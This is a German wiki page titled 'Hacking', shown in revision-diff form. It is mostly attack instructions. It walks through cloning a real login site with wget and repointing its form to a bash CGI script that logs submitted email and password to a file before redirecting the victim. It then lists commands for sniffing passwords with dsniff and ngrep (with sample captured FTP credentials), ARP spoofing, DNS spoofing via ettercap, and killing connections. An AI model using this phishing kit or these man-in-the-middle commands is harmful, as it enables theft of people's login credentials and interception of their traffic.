Hacking: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 15: Zeile 15:
  
 
==cgi erstellen==
 
==cgi erstellen==
 +
/usr/lib/cgi-bin/login.cgi
 
<pre>
 
<pre>
 
#!/bin/bash
 
#!/bin/bash

Version vom 13. Oktober 2015, 07:37 Uhr

webseite spiegeln

apt-get install apache2 
cd /var/www/
rm -r html

abziehen der Seite

wget -l 1 -r http://www.schmeich.de
mv  http://www.schmeich.de html
  • besser mit browser

manipulation

ersetze in index.html 

action="https://www.schmeich.de/login.php?login_attempt=1&lwv=110"

durch 

action="http://www.schmeich.de/cgi-bin/login.cgi"

cgi erstellen

/usr/lib/cgi-bin/login.cgi

#!/bin/bash
if [ "$REQUEST_METHOD" = "POST" ]; then
    if [ "$CONTENT_LENGTH" -gt 0 ]; then
        read -n $CONTENT_LENGTH POST_DATA <&0
    fi
fi
MAIL=$(echo $POST_DATA | cut -f 2 -d "&")
PASS=$(echo $POST_DATA | cut -f 3 -d "&")
echo "$MAIL $PASS" >> /tmp/geheim.log

cat<<HERE

<!doctype html>

<html>
<meta http-equiv="refresh" content="0; url=https://www.schmeich.de/" />
</html>
HERE

ettercap

http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/

dsniff

Dsniff Tools

Installation unter Ubuntu oder Debian 

apt-get install dsniff

Passwörter spionieren mit dsniff - Beispiele

Dsniff

sniffen
dsniff -n -i eth1 -s 1500 host  85.10.194.199 -w geheim.dat

auswerten
dsniff -r geheim.dat 
-----------------
02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp)
USER wuschel
PASS suxa

optionen
-n                  =  numerische Ausgabe                   
-i eth1             =  Schnittstelle  
-s 1500             =  Länge des Mitschnittes pro Paket
-w geheim.dat       =  schreibe in die Datei  
host 85.10.194.199  =  Muster wie bei tcpdump
-r geheim.dat       =  lese aus der Datei

Tcpkill

tcpkill port 80

optionen
port 80            =  Muster wie bei tcpdump

Arpspoof

arpspoof -t 192.168.254.7 192.168.254.5

optionen
-t 192.168.254.7   = Angriffszeil
192.168.254.5      = Mac Adresse wird mit lokaler MacAdresse vertauscht

Webspy

mozilla&
webspy 192.168.254.22

Dnsspoof

Der Nameserver muss umgeleitet werden 
ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/

hosts anlegen
192.168.254.4    www.xinux.de

dnsspoofen
dnsspoof -f hosts

Ngrep

Installation unter Ubuntu oder Debian 

apt-get install ngrep

Passwörter spionieren mit ngrep - Beispiele 

sniffen
ngrep -d eth1 -s 1500 -l -i 'PASS|USER'  port 21

optionen
-d eth1            =   Schnittstelle
-s 1500            =  Länge des Mitschnittes pro Paket
-l                 =  Ausgabe wird zeilenweise gepuffert 
-i                 =  Ignoriere Gross und Kleinschreibung  
'PASS|USER'        =  Suchmuster in den Daten PASS oder USER
port 21            =  Muster wie bei tcpdump
Abgerufen von „http://wiki.ixheim.de/index.php?title=Hacking&oldid=7424